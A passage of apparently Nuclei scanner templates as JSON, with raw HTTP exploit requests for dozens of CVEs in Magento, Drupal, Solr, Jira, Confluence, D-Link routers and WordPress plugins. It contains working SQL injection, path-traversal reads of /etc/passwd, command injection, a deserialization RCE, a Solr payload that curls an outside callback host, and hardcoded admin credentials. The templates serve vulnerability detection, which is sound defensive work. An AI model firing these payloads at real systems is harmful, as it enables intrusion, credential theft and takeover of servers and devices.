/content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"<afData>\\u0041\\u0042\\u0043</afData>\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<afData>ABC<afBoundData/>"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7139","info":{"name":"Magento - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"text/x-magento-init\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nGET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=6","contains(content_type_1, \"application/json\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["contains(content_type_2, \"application/json\") && contains(content_type_3, \"application/json\")","status_code_2 == 200 && status_code_3 == 400","len(body_2) == 2 && len(body_3) == 2"],"condition":"and"}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8390","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=\n","POST /index.php/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch[keywords]=e\"><script>alert(document.domain)</script>&search_by_extrafields[]=9\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","alert alert-info alert-search-result"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"login\\[_csrf_token\\]\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-14223","info":{"name":"Alfresco Share - Open Redirect","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/share/page/dologin"],"body":"success=%2Fshare%2Fpage%2F&failure=:\\\\interact.sh&username=baduser&password=badpass\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"]}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } }","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5127","info":{"name":"YouPHPTube Encoder 2.3 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png","{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg","{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/objects/{{filename}}.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=x onerror=alert(1)>>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-10092","info":{"name":"Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5cgoogle.com/evil.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Proxy Error"]},{"type":"word","words":["<a href=\"/\\google.com/evil.html\">"]}]}]},{"id":"CVE-2019-9618","info":{"name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: {{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-0230","info":{"name":"Apache Struts <=2.5.20 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id={{str}}%25{128*128}"],"matchers":[{"type":"word","part":"body","words":["{{str}}16384"]}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n<?php\necho md5('CVE-2019-20183');\nunlink(__FILE__);\n?>\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-6112","info":{"name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["id=\"sell-media-search-text\" class=\"sell-media-search-text\"","alert(1337)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15811","info":{"name":"DomainMOD <=4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"onfocus=\\\"alert(document.domain)\\\"autofocus=\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20085","info":{"name":"TVT NVMS 1000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19985","info":{"name":"WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name","Email","Status","Created On"],"condition":"and"},{"type":"word","part":"header","words":["Content-Disposition: attachment; filename=all-contacts.csv;"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16920","info":{"name":"D-Link Routers - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}\n\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\\\Windows\\\\win.ini')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3912","info":{"name":"LabKey Server Community Edition <18.3.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37153","info":{"name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /fw.login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"admin\"><script>alert(document.domain)</script>","Artica Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27984","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmenu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"components/menu/classes/functions.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-41412","info":{"name":"perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0599","info":{"name":"WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id=\"><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")"],"condition":"and"},{"type":"word","part":"body","words":["id=\"mmursp_id\" value=\"\\\"><svg/onload=alert(document.domain)>\" />"]}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: 